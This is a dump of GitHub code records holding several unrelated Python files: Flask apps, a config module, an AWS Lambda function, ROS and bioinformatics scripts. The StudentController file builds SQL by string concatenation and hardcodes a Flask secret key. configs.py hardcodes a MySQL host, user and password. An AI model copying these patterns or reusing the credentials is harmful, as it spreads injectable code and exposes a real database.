word2[j - 1] else 1\n dp[i][j] = min(dp[i - 1][j] + 1, # delete\n dp[i][j - 1] + 1, # insert\n dp[i - 1][j - 1] + cost) # replace\n for e in dp:\n print(e)\n print('')\n return dp[-1][-1]\n\n\nprint(min_distance('horse', 'rose'))\nprint(min_distance('intention', 'execution'))\nprint(min_distance('algorithm', 'altruistic'))\n","repo_name":"vpc20/python-dynamic-programming","sub_path":"EditDistance.py","file_name":"EditDistance.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69826657864","text":"from Bio import SeqIO\n\n\nclass Genome:\n\n def __init__(self, file):\n\n self.file = file\n self.dict_genome = None\n\n def read_fasta(self):\n \"\"\"\n Reads a fasta file using SeqIO\n \"\"\"\n self.dict_genome = SeqIO.to_dict(SeqIO.parse(self.file, \"fasta\"))\n\n def check_position_sequence_in_genome(self, genome, seq):\n \"\"\"\n Returns a dictionary containing the start\n and end of each sequence inside genome.\n \"\"\"\n result = dict()\n\n for s in seq:\n\n intermediate_list = []\n\n for i in range(0, len(genome), 1):\n if genome[i:len(s) + i] == s:\n intermediate_list.append((s, i, len(s) + i))\n\n result[s] = intermediate_list\n\n return result\n\n","repo_name":"zohyan/window-search-in-a-genome","sub_path":"genome.py","file_name":"genome.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"71381522505","text":"from Student import Student\nfrom flask import Flask\nfrom flask_mysqldb import MySQL #for flask-mysqldb\nfrom Module import *\napp = Flask(__name__)\n# Database Config\napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = ''\napp.config['MYSQL_HOST'] = '127.0.0.1'\napp.config['MYSQL_DB'] = '2101project'\napp.config['MYSQL_CURSORCLASS'] = 'DictCursor'\napp.config['SECRET_KEY'] = b'6hc/_psp,./;2ZZx3c6_s,1//'\n\nmysql = MySQL(app)\n\nclass StudentController:\n def __init__(self, UID):\n self.UID = UID\n\n def viewModule(self, type=\"\", MID=1):\n # retrieve all modules from DB\n if type == \"code\":\n module = moduleList(self.UID).fetchModules()\n elif type == \"name\":\n module = moduleList(self.UID).getModuleName(MID)\n return module\n\n def viewFeedback(self):\n cur = mysql.connection.cursor()\n cur.execute(\n \"SELECT * FROM feedback f, user u WHERE FReceiver=\" + self.UID + \" AND f.FSender = u.UID;\")\n data = cur.fetchall()\n\n return data\n\n","repo_name":"puglord96/ICT-2101-Project","sub_path":"StudentController.py","file_name":"StudentController.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74393689544","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @File : configs.py\n# @Date : 28-12-2021\n# @Author : Payne\n# @Email : wuzhipeng1289690157@gmail.com\n# @Desc:\nfrom typing import AnyStr, List, Dict\nfrom environs import Env\nfrom loguru import logger\nfrom os.path import dirname, abspath, join\n\nenv = Env()\nenv.read_env()\n\n# definition of dirs\nROOT_DIR = dirname(dirname(abspath(__file__)))\n\n# definition of environments\nDEV_MODE, TEST_MODE, PROD_MODE = \"dev\", \"test\", \"prod\"\nAPP_ENV = env.str(\"APP_ENV\", DEV_MODE).lower()\nAPP_DEBUG = env.bool(\"APP_DEBUG\", True if APP_ENV == DEV_MODE else False)\nAPP_DEV = IS_DEV = APP_ENV == DEV_MODE\nAPP_PROD = IS_PROD = APP_ENV == PROD_MODE\nAPP_TEST = IS_TEST = APP_ENV == TEST_MODE\n\n# logs config\nENABLE_LOG_FILE = env.bool(\"ENABLE_LOG_FILE\", True)\nENABLE_LOG_RUNTIME_FILE = env.bool(\"ENABLE_LOG_RUNTIME_FILE\", True)\nENABLE_LOG_ERROR_FILE = env.bool(\"ENABLE_LOG_ERROR_FILE\", True)\n\nLOG_DIR = join(ROOT_DIR, env.str(\"LOG_DIR\", \"Logs\"))\n\nLOG_LEVEL_MAP = {DEV_MODE: \"DEBUG\", TEST_MODE: \"INFO\", PROD_MODE: \"ERROR\"}\n\nLOG_LEVEL = LOG_LEVEL_MAP.get(APP_ENV)\n\nif ENABLE_LOG_FILE:\n if ENABLE_LOG_RUNTIME_FILE:\n logger.add(\n env.str(\"LOG_RUNTIME_FILE\", join(LOG_DIR, \"runtime.log\")),\n level=LOG_LEVEL,\n enqueue=True,\n rotation=\"1 week\",\n retention=\"20 days\",\n )\n if ENABLE_LOG_ERROR_FILE:\n logger.add(\n env.str(\"LOG_ERROR_FILE\", join(LOG_DIR, \"error.log\")),\n level=\"ERROR\",\n enqueue=True,\n rotation=\"1 week\",\n )\n\n# from environs import Env\n# env = Env()\n\n# Filter URL\n# ResourceList: Dict = env.dict('URLS', {\n# \"xiaohongshu\": \"xiaohongshu.com/api/sns/v10/search/notes\"\n# })\n\n# Search key word List\n# KeyWord: List[AnyStr] = env.list('KeyWord', [])\n\n# Mysql Client Param\n# MySQLClientParam: Dict = env.dict('MySQLClient', {\n# 'host': '127.0.0.1',\n# 'port': 3306,\n# 'user': 'root',\n# 'password': '123123',\n# 'database': '',\n# })\n\nResourceList: Dict = {\n \"xhs_lv\": \"xiaohongshu.com/api/sns/v10/search/notes\"\n # \"xhs_search\": \"xiaohongshu.com/api/sns/v10/search/notes\"\n}\n\nMySQLClientParam: Dict = {\n \"host\": \"10.21.200.48\",\n \"port\": 3306,\n \"user\": \"opinion\",\n \"password\": \"vDGM0lspmy=\",\n \"database\": \"opinion\",\n}\n","repo_name":"WebSpiderSuperStar/Intermediary","sub_path":"Intermediary/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36072902174","text":"\"\"\"Create a SNS notfication once a transcibe job is completed\"\"\"\nimport os\n\nimport aws_lambda_powertools as alp\nimport aws_lambda_powertools.utilities.data_classes as aws_dataclasses\nimport aws_lambda_powertools.utilities.typing as aws_tyiping\nimport boto3\n\nlogger = alp.Logger()\n\n@logger.inject_lambda_context\ndef lambda_handler(event: dict[str, any], context: aws_tyiping.LambdaContext) -> dict[str, any]:\n event = aws_dataclasses.S3Event(event)\n logger.info(f\"Got event: {event.raw_event!r}\")\n\n destination = os.getenv(\"DESTINATION_SNS\")\n if not destination:\n logger.error(\"No destination set...\")\n return {}\n\n with open(\"email_template.md\", \"r\") as fp:\n body = fp.read()\n\n body = body.format(file_uri=f\"s3://{event.bucket_name}/{event.object_key}\")\n\n sns_client = boto3.client(\"sns\")\n sns_client.publish(\n TopicArn=destination,\n Message=body,\n Subject=f\"Transcribe job completion for file: s3://{event.bucket_name}/{event.object_key}\",\n )\n\n return {}\n","repo_name":"HanaPoulpe/AWSTranscribeBase","sub_path":"src/awslambda/email_notification/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"15354742757","text":"from flask_smorest import Blueprint , abort\nfrom flask.views import MethodView\nfrom resources.Schemas import TagSchema,PlainTagSchmea , TagAndItemSchema\nfrom db import db\nfrom models import ItemModel , StoreModel , TagModel\nfrom sqlalchemy.exc import SQLAlchemyError\n\nblp = Blueprint(\"tags\" , __name__ , description = 'operation on tags')\n\n@blp.route(\"/store//tag\")\nclass Tags(MethodView):\n\n # this will return all tags , at given store\n @blp.response(200 ,PlainTagSchmea(many=True))\n def get(self,store_id):\n store = StoreModel.query.get_or_404(store_id)\n return store.tags.all()\n\n @blp.arguments(TagSchema)\n @blp.response(201, TagSchema)\n def post(self,tag_data,store_id):\n if(TagModel.query.filter(TagModel.store_id == store_id , TagModel.tag_name == tag_data['tag_name']).first()):\n abort(400 , message = \"Tag is already created\")\n tag = TagModel(store_id = store_id , **tag_data)\n try:\n db.session.add(tag)\n db.session.commit()\n except SQLAlchemyError as e:\n abort(500 , message= str(e))\n return tag\n\n@blp.route(\"/tag/\")\nclass TagsList(MethodView):\n\n @blp.response(200 , PlainTagSchmea)\n def get(self,tag_id):\n return TagModel.query.get_or_404(tag_id)\n\n def delete(self,tag_id):\n tag = TagModel.query.get_or_404(tag_id)\n if(tag):\n db.session.delete(tag)\n db.session.commit()\n return {\"message\" : \"tag deleted successfully\"}\n\n@blp.route(\"/item//tag/\")\nclass LinkTagsToItem(MethodView):\n\n @blp.response(201, TagSchema)\n def post(self, item_id , tag_id):\n item = ItemModel.query.get_or_404(item_id)\n tag = TagModel.query.get_or_404(tag_id)\n item.tags.append(tag)\n try:\n db.session.add(item)\n db.session.commit()\n except SQLAlchemyError as e:\n abort(500 , message=str(e))\n return tag\n\n def delete(self, item_id, tag_id):\n item = ItemModel.query.get_or_404(item_id)\n tag = TagModel.query.get_or_404(tag_id)\n item.tags.remove(tag)\n try:\n db.session.add(item)\n db.session.commit()\n except SQLAlchemyError as e:\n abort(500, message=str(e))\n return {\"message\" : \"item removed from tag \", \"item\" : item.item_name , \"tag\" : tag.tag_name }\n\n","repo_name":"skarwa4491/Store","sub_path":"resources/Tags.py","file_name":"Tags.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29812527049","text":"\"\"\"\n\n @brief: The test script for the coordinate transformation using the d435 camera, aruco-based world frame, and the manually set world-to-robot transformation\n\n @author: Yiye Chen. yychen2019@gatech.edu\n @date: 11/28/2021\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\n\nimport camera.d435.runner as d435\nfrom camera.extrinsic.aruco import CtoW_Calibrator_aruco\nimport camera.utils.display as display\n\nfrom Surveillance.utils.transform import frameTransformer\n\n# The world-to-robot transformation\nfrom Surveillance.utils.transform_mats import M_WtoR\nfrom coordTransform_colors import *\n\n# The D435 starter\nd435_configs = d435.D435_Configs(\n W_dep=848,\n H_dep=480,\n W_color=1920,\n H_color=1080\n)\n\nd435_starter = d435.D435_Runner(d435_configs)\n\n# The aruco calibrator\ncalibrator_CtoW = CtoW_Calibrator_aruco(\n d435_starter.intrinsic_mat,\n distCoeffs=np.array([0.0, 0.0, 0.0, 0.0, 0.0]),\n markerLength_CL = 0.078,\n maxFrames = 30,\n flag_vis_extrinsic = True,\n flag_print_MCL = False,\n stabilize_version =False \n)\n\n# the frame Transformer\nframe_transformer = frameTransformer(\n M_intrinsic=d435_starter.intrinsic_mat,\n M_WtoC=None,\n M_WtoR=M_WtoR,\n)\n\n# sample some target points from the robot frame\ntarget_points_R = np.array([\n [0.2, -0.15, 0],\n [0.2, 0, 0],\n [0.2, 0.15, 0],\n [0.3, -0.15, 0],\n [0.3, 0, 0],\n [0.3, 0.15, 0],\n])\n\n\nplt.figure(1)\nplt.show(block=False)\nplt.ion()\ncali_finish = False\nwhile(not cali_finish):\n # get frames\n rgb, dep, success = d435_starter.get_frames()\n if not success:\n print(\"Cannot get the camera signals. Exiting...\")\n exit()\n\n # calibrate\n M_CL, corners_aruco, img_with_ext, status = calibrator_CtoW.process(rgb, dep) \n\n # update M_CtoW\n frame_transformer.M_WtoC = M_CL\n\n # update the flag\n cali_finish = calibrator_CtoW.stable_status\n\n # visualize calibration\n display.display_images_cv([img_with_ext[:,:,::-1]], ratio=0.5, \\\n window_name=\"The extrinsic calibration(right, Press \\'q\\' to exit\") \n\n \n opKey = cv2.waitKey(1)\n if opKey == ord('q'):\n break\n\n\n # transform the target points and visualize them\n p_W, p_C, p_Img = frame_transformer.parsePRob(target_points_R)\n print(\"The world frame coordinate: {}\".format(p_W))\n print(\"The camera frame coordinate: {}\".format(p_C))\n print(\"The image frame coordinate: {}\".format(p_Img))\n\n # plot the target points\n rgb = np.ascontiguousarray(rgb, dtype=np.uint8)\n for tP in p_Img.astype(int):\n rgb = cv2.circle(rgb, (tP[0], tP[1]), radius=5, color=color_imgF_orig, thickness=-1)\n display.display_images_cv([rgb[:,:,::-1]], ratio=0.5, \\\n window_name=\"The projection of the target position Press \\'q\\' to exit\") \n\n\n\ncv2.destroyAllWindows()\nprint(\"Calibration complete\")\n\n# parse the target points\np_W, p_C, p_Img = frame_transformer.parsePRob(target_points_R)\nprint(\"The world frame coordinate: {}\".format(p_W))\nprint(\"The camera frame coordinate: {}\".format(p_C))\nprint(\"The image frame coordinate: {}\".format(p_Img))\n\nwhile(True):\n\n # get frames\n rgb, dep, success = d435_starter.get_frames()\n\n #pC_map, pW_map, pR_map = frame_transformer.parseDepth(dep)\n #plt.figure(1)\n #plt.imshow(pW_map[:,:,-1])\n #plt.draw()\n #plt.pause(1)\n\n # plot the target points\n rgb = np.ascontiguousarray(rgb, dtype=np.uint8)\n for tP in p_Img.astype(int):\n rgb = cv2.circle(rgb, (tP[0], tP[1]), radius=5, color=color_imgF_orig, thickness=-1)\n display.display_images_cv([rgb[:,:,::-1]], ratio=0.5, \\\n window_name=\"The projection of the target position Press \\'q\\' to exit\") \n\n opKey = cv2.waitKey(1)\n if opKey == ord('q'):\n break\n","repo_name":"ivapylibs/Surveillance","sub_path":"testing/coordTransform_PRob.py","file_name":"coordTransform_PRob.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"38837307668","text":"#! /usr/bin/env python\n\nimport rosbag\n\nif __name__ == '__main__':\n bag = rosbag.Bag('hw4_.bag')\n \n x_a = [msg.pose.pose.position.x for (topic, msg, t) in bag.read_messages(topics=['/robot0/odom'])]\n y_a = [msg.pose.pose.position.y for (topic, msg, t) in bag.read_messages(topics=['/robot0/odom'])]\n t_t = [t.to_sec() for (topic, msg,t) in bag.read_messages(topics = ['/robot0/odom'])]\n prijeden_put = 0\n x_minus = x_a[0]\n y_minus = y_a[0]\n\n for (x_in, y_in) in zip(x_a, y_a):\n prijeden_put += ((x_in-x_minus)**2 + (y_in-y_minus)**2)**0.5\n x_minus = x_in\n y_minus = y_in\n\n\n srednja_brzina = (float)(prijeden_put)/(t_t[len(t_t)-1]-t_t[0])\n","repo_name":"br5555/ROS_Homeworks","sub_path":"dz4/catkin_ws/src/zadaca3/scripts/hw4_bag.py","file_name":"hw4_bag.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"10788973394","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport os\nimport sys\nimport argparse\nimport re\nimport time\nimport datetime\nimport pandas as pd\n\ndef current_time():\n\treturn datetime.datetime.now().strftime('%b-%d-%Y %H:%M:%S')\n\n\ndef STAR_index(threads, genome, gtf, sjdbOverhang):\n\tos.system(\"STAR --runMode genomeGenerate --runThreadN %d --genomeFastaFiles %s --sjdbGTFfile %s --sjdbOverhang %d --genomeDir .\" %(threads, genome, gtf, sjdbOverhang))\n\n\ndef hisat2_index(threads, genome, gtf):\n\tos.system(\"hisat2_extract_splice_sites.py %s > genome.ss\" % gtf)\n\tos.system(\"hisat2_extract_exons.py %s > genome.exon\" % gtf)\n\tos.system(\"hisat2-build -p %d %s --ss genome.ss --exon genome.exon genome_tran\" % (threads, genome))\n\n\ndef GTF(gtf):\n\td_name = {}\n\td_id = {}\n\n\tsList = []\n\twith open(gtf) as f:\n\t\tfor line in f:\n\t\t\tif not line.startswith('#'):\n\t\t\t\t(chrid, source, genetype, start, end, score, strand, phase, attribute_string) = line.rstrip().split('\\t')\n\t\t\t\tattributes = {}\n\t\n\t\t\t\tif genetype=='gene':\n\t\t\t\t\tkey_value_pair_set = attribute_string.split('; ')\n\t\t\t\t\tfor key_value_pair in key_value_pair_set[: -1]:\n\t\t\t\t\t key, value = key_value_pair.split(' ')\n\t\t\t\t\t attributes[key] = value[1: -1] ### remove the first str and last str\n\t\t\t\t\t### specially for last field\n\t\t\t\t\tkey, value = key_value_pair_set[-1][: -1].split(' ')\n\t\t\t\t\tattributes[key] = value[1: -1]\n\t\t\t\t\t\n\t\t\t\t\tgene_id = attributes.get('gene_id')\n\t\t\t\t\tgene_name = attributes.get('gene_name')\n\t\t\t\t\tgene_type = attributes.get('gene_biotype')\n\t\n\t\t\t\t\t#print(gene_id, gene_name, gene_type)\n\t\t\t\t\td_name[gene_name] = gene_type\n\t\t\t\t\td_id[gene_id] = gene_type\n\n\t\t\t\t\tsList.append([gene_id, gene_name, gene_type])\n\t'''\n\tdf_name =pd.Series(d_name)\n\tdf_name_csv = \"gene_name.type.txt\"\n\tdf_name.to_csv(df_name_csv, header=False, sep='\\t')\n\n\tdf_id=pd.Series(d_id)\n\tdf_id_csv = \"gene_id.type.txt\"\n\tdf_id.to_csv(df_id_csv, header=False, sep='\\t')\n\t'''\n\tdf = pd.DataFrame(sList)\n\tdf_csv = \"gene_type.txt\"\n\tdf.to_csv(df_csv, header=False, index=True, sep='\\t')\n\n\n\ndef main(mapper, threads, genome, gtf, sjdbOverhang):\n\tif mapper == 'STAR':\n\t\tSTAR_index(threads, genome, gtf, sjdbOverhang)\n\telif mapper == 'hisat2':\n\t\thisat2_index(threads, genome, gtf)\n\tos.system(\"cp %s annotation.gtf\" % gtf)\n\n\nif __name__ == '__main__':\n\t\n\tparser = argparse.ArgumentParser(description='build genome index')\n\n\tparser.add_argument('-mapper', choices=['hisat2', 'STAR'], type=str, help='choose the mapping program')\n\tparser.add_argument('-genome', type=str, help='reference genome sequences')\n\tparser.add_argument('-gtf', type=str, help='annotation GTF file')\n\tparser.add_argument('-threads', default=5, type=int, help='number of threads (CPUs) to use (default: 5)')\n\tparser.add_argument('-sjdbOverhang', default=149, type=int, help='max(ReadLength)-1, the default value of 149 will work for Illumina 2x150b paired-end reads')\n\t\n\targs = parser.parse_args()\n\t\n\tprint(\"\\n%s ..... Start RNAseq processing\" % (current_time()))\n\tstart_time = time.time()\n\n\tmain(args.mapper, args.threads, args.genome, args.gtf, args.sjdbOverhang)\n\tGTF(args.gtf)\n\t\n\tend_time = time.time()\n\trun_time = round((end_time - start_time)/60, 5)\n\tprint(\"\\n%s ..... Finished all. Used time: %s m\\n\" % (current_time(), run_time))\n\n\n\n\n\n\n","repo_name":"liuwell/rapvis","sub_path":"rapvis/rapvis_build.py","file_name":"rapvis_build.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28555839663","text":"# Stwórz moduł, który zajmuje się jedynie otwieraniem plików - oferuje bezpieczny sposób odczytu oraz bezpieczny zapis.\n# Funkcja czytająca pliki sprawdza najpierw czy dany plik istnieje oraz czy jest niepusty.\n# Funkcja zapisująca do pliku chroni przed nadpisaniem istniejącego pliku.\n\nimport module_file as mf\n\ndef menu():\n x = input('1 - read from file\\n2 - save to file\\n')\n\n if x == '1':\n filename = input('File name or path to read:')\n content = mf.read_from_file(filename)\n print(content)\n elif x == '2':\n save_file = input('File name or path to save:')\n content = input('Write your content here: ')\n mf.save_to_file(save_file, content)\n print('Saved!')\n else:\n print(\"Wrong input\")\n\n\ndef main():\n menu()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ritaly/kurs_python","sub_path":"09_moduly/zad3/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11800878765","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC ###Ingest Constructors.JSON file###\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_data_source\", \"\")\nv_data_source = dbutils.widgets.get(\"p_data_source\")\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_file_date\", \"2021-03-21\")\nv_file_date = dbutils.widgets.get(\"p_file_date\")\n\n# COMMAND ----------\n\n# MAGIC %run \"../Includes/configuration\"\n\n# COMMAND ----------\n\n# MAGIC %run \"../Includes/common_functions\"\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import col\nfrom pyspark.sql.functions import current_timestamp\nfrom pyspark.sql.functions import lit\n\n# COMMAND ----------\n\nconstructor = spark.read.json(f\"{raw_folder_path}/{v_file_date}/constructors.json\", schema = \"constructorId INT, constructorRef STRING, name STRING, nationality STRING, url STRING\")\n\n# COMMAND ----------\n\ndisplay(constructor)\n\n# COMMAND ----------\n\nconstructor_new = constructor.drop(col('url'))\n\n# COMMAND ----------\n\nconstructor_final = constructor_new.withColumnRenamed(\"constructorId\", \"constructor_id\").withColumnRenamed(\"constructorRef\", \"constructor_ref\").withColumn(\"data_source\", lit(v_data_source)).withColumn(\"file_date\", lit(v_file_date))\n\n# COMMAND ----------\n\nconstructor_final = add_ingestion_date(constructor_final)\n\n# COMMAND ----------\n\ndisplay(constructor_final)\n\n# COMMAND ----------\n\nconstructor_final.write.mode(\"overwrite\").parquet(f\"{processed_folder_path}/constructors\")\n\n# COMMAND ----------\n\nconstructor_final.write.mode(\"overwrite\").format(\"parquet\").saveAsTable(\"f1_processed_new.constructors\")\n\n# COMMAND ----------\n\nconstructor_final.write.mode(\"overwrite\").format(\"delta\").saveAsTable(\"f1_processed_dl.constructors\")\n\n# COMMAND ----------\n\ndbutils.notebook.exit(\"Success\")\n","repo_name":"shreyas768/Formula1_Azure_Databricks","sub_path":"Ingestion/C.ingest_constructors_JSON_file.py","file_name":"C.ingest_constructors_JSON_file.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15992934503","text":"import rclpy\nfrom rclpy.node import Node\nfrom rclpy.duration import Duration\n\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\n\nfrom ros2_mediapipe_msgs.msg import MediapipePose\nfrom ros2_mediapipe_msgs.msg import MediapipeHands\n\nfrom visualization_msgs.msg import Marker\nfrom visualization_msgs.msg import MarkerArray\n\nfrom geometry_msgs.msg import Point \n\n\nimport cv2\nimport mediapipe as mp\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\nmp_hands = mp.solutions.hands\n\n\nclass MediapipeHandsROS2(Node):\n \n \n def __init__(self):\n super().__init__('ros2_mediapipe_hands')\n \n self.bridge = []\n self.bridge = CvBridge()\n \n #publisher\n self.publisher_2D_ = self.create_publisher(MediapipeHands, 'ros2_mediapipe/mediapipe_hands/normalized_image_2D', 10)\n self.publisher_3D_ = self.create_publisher(MediapipeHands, 'ros2_mediapipe/mediapipe_hands/points_3D_coordinates', 10)\n self.publisher_pixel_ = self.create_publisher(MediapipeHands, 'ros2_mediapipe/mediapipe_hands/pixel', 10)\n self.publisher_image_ = self.create_publisher(Image, 'ros2_mediapipe/mediapipe_hands/image', 10)\n \n self.publisher_marker_ = self.create_publisher(MarkerArray,'ros2_mediapipe/mediapipe_hands/normalized_image_2D_MarkerArray',10)\n self.publisher_marker_ = self.create_publisher(MarkerArray,'ros2_mediapipe/mediapipe_hands/normalized_image_2D_MarkerArray',10)\n \n self.publisher_marker_ = self.create_publisher(MarkerArray,'ros2_mediapipe/mediapipe_hands/normalized_image_2D_MarkerArray',10)\n self.publisher_marker_3D_ = self.create_publisher(MarkerArray,'ros2_mediapipe/mediapipe_hands/points_3D_coordinates_world_MarkerArray',10)\n \n \n #Subscription\n self.subscription = self.create_subscription(\n Image,\n 'ros2_mediapipe/input/image_raw',\n self.listener_callback,\n 0)\n self.subscription # prevent unused variable warning\n \n\n def listener_callback(self, msg):\n image = self.bridge.imgmsg_to_cv2(msg, desired_encoding='rgb8')\n self.apply_mediapipe(image)\n\n \n def apply_mediapipe(self, image):\n with mp_hands.Hands(\n model_complexity=0,\n min_detection_confidence=0.5,\n min_tracking_confidence=0.5) as hands:\n # pass by reference.\n image.flags.writeable = False\n results = hands.process(image)\n \n self.publish_results(results, image)\n\n \n \n def publish_results(self, results, image): \n \n MediapipeHands_2D = MediapipeHands() \n left_hand_points_2D = []\n right_hand_points_2D = []\n \n MediapipeHands_3D = MediapipeHands() \n left_hand_points_3D = []\n right_hand_points_3D = []\n \n MediapipeHands_pixel = MediapipeHands() \n left_hand_points_pixel = []\n right_hand_points_pixel = []\n \n height = image.shape[1]\n width = image.shape[0]\n \n \n \n if results.multi_handedness != None: \n cont_for = 0\n for i in range(0,len(results.multi_handedness)):\n cont = 0\n hand_points =[]\n hand_points_3D =[]\n hand_points_pixel = []\n for j in range(0,len(results.multi_hand_landmarks[i].landmark)):\n mp = MediapipePose()\n mp.id = j\n mp.x = results.multi_hand_landmarks[i].landmark[j].x\n mp.y = results.multi_hand_landmarks[i].landmark[j].y\n mp.z = results.multi_hand_landmarks[i].landmark[j].z\n hand_points.append(mp)\n \n \n mp3D = MediapipePose()\n mp3D.id = j\n mp3D.x = results.multi_hand_world_landmarks[i].landmark[cont].x\n mp3D.y = results.multi_hand_world_landmarks[i].landmark[cont].y\n mp3D.z = results.multi_hand_world_landmarks[i].landmark[cont].z\n hand_points_3D.append(mp3D)\n \n mpPixel = []\n mpPixel = MediapipePose()\n mpPixel.id = j\n mpPixel.x = results.multi_hand_landmarks[i].landmark[j].x*height\n mpPixel.y = results.multi_hand_landmarks[i].landmark[j].y*width\n mpPixel.z = 0.0\n hand_points_pixel.append(mpPixel)\n \n cont += 1 \n \n \n if results.multi_handedness[i].classification[0].label == \"Left\":\n left_hand_points_2D = []\n left_hand_points_2D = hand_points\n left_hand_points_3D = []\n left_hand_points_3D = hand_points_3D\n left_hand_points_pixel = []\n left_hand_points_pixel = hand_points_pixel\n elif results.multi_handedness[i].classification[0].label == \"Right\":\n right_hand_points_2D = []\n right_hand_points_2D = hand_points\n right_hand_points_3D = []\n right_hand_points_3D = hand_points_3D\n right_hand_points_pixel = []\n right_hand_points_pixel = hand_points_pixel\n \n \n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n if results.multi_hand_landmarks:\n for hand_landmarks in results.multi_hand_landmarks:\n mp_drawing.draw_landmarks(\n image,\n hand_landmarks,\n mp_hands.HAND_CONNECTIONS,\n mp_drawing_styles.get_default_hand_landmarks_style(),\n mp_drawing_styles.get_default_hand_connections_style()) \n \n\n for i in (right_hand_points_pixel):\n cv2.putText(image,str(i.id),(int(i.x),int(i.y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,100,200), 2)\n \n for i in (left_hand_points_pixel):\n cv2.putText(image,str(i.id),(int(i.x),int(i.y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,100,200), 2) \n\n \n MediapipeHands_2D.left_hand_landmarks = left_hand_points_2D \n MediapipeHands_2D.right_hand_landmarks = right_hand_points_2D\n self.publisher_2D_.publish(MediapipeHands_2D) \n \n \n #Plotting in 3D in rviz, using markers\n self.rviz_3d_hand(left_hand_points_2D, right_hand_points_2D, self.publisher_marker_, 0.05)\n self.rviz_3d_hand(left_hand_points_3D, right_hand_points_3D, self.publisher_marker_3D_, 0.01)\n \n \n MediapipeHands_3D.left_hand_landmarks = left_hand_points_3D \n MediapipeHands_3D.right_hand_landmarks = right_hand_points_3D\n self.publisher_3D_.publish(MediapipeHands_3D) \n \n MediapipeHands_pixel.left_hand_landmarks = left_hand_points_pixel \n MediapipeHands_pixel.right_hand_landmarks = right_hand_points_pixel\n self.publisher_pixel_.publish(MediapipeHands_pixel) \n \n self.publisher_image_.publish(self.bridge.cv2_to_imgmsg(image, \"bgr8\"))\n \n \n \n\n def rviz_3d_hand(self, left_hand_points, right_hand_points, pub, factor):\n markerArray = MarkerArray()\n \n \n if (left_hand_points!= []):\n for i in range(0,len(left_hand_points)):\n marker = Marker()\n marker.lifetime = \tDuration(seconds=1).to_msg()\n marker.header.frame_id = \"/ros2_mediapipe\"\n marker.type = marker.SPHERE\n marker.action = marker.ADD\n marker.scale.x = factor\n marker.scale.y = factor\n marker.scale.z = factor\n marker.color.a = 1.0\n marker.color.r = 1.0\n marker.color.g = 1.0\n marker.color.b = 0.0\n marker.pose.orientation.w = 1.0\n marker.pose.position.x = left_hand_points[i].x\n marker.pose.position.y = left_hand_points[i].y\n marker.pose.position.z = left_hand_points[i].z\n \n markerArray.markers.append(marker)\n \n \n marker_links = self.add_links_markers(left_hand_points,(factor/2))\n markerArray.markers.append(marker_links)\n \n if (right_hand_points!= []): \n for i in range(0,len(right_hand_points)):\n marker = Marker()\n marker.lifetime = \tDuration(seconds=1).to_msg()\n marker.header.frame_id = \"/ros2_mediapipe\"\n marker.type = marker.SPHERE\n marker.action = marker.ADD\n marker.scale.x = factor\n marker.scale.y = factor\n marker.scale.z = factor\n marker.color.a = 1.0\n marker.color.r = 1.0\n marker.color.g = 1.0\n marker.color.b = 0.0\n marker.pose.orientation.w = 1.0\n marker.pose.position.x = right_hand_points[i].x\n marker.pose.position.y = right_hand_points[i].y\n marker.pose.position.z = right_hand_points[i].z\n \n markerArray.markers.append(marker) \n \n marker_links = self.add_links_markers(right_hand_points,(factor/2))\n markerArray.markers.append(marker_links)\n \n \n id = 0\n for m in markerArray.markers:\n m.id = id\n id += 1\n \n \n pub.publish(markerArray)\n \n def add_links_markers(self,points, factor):\n \n marker = Marker()\n marker.lifetime = \tDuration(seconds=1).to_msg()\n marker.header.frame_id = \"/ros2_mediapipe\"\n marker.type = 5\n marker.action = marker.ADD\n marker.scale.x = factor\n marker.scale.y = factor\n marker.scale.z = factor\n marker.color.a = 1.0\n marker.color.r = 1.0\n marker.color.g = 1.0\n marker.color.b = 0.0\n marker.pose.orientation.w = 1.0\n \n for i in range(0,4):\n p = Point()\n p.x = points[i].x;\n p.y = points[i].y;\n p.z = points[i].z;\n marker.points.append(p) \n \n p = Point()\n p.x = points[i+1].x;\n p.y 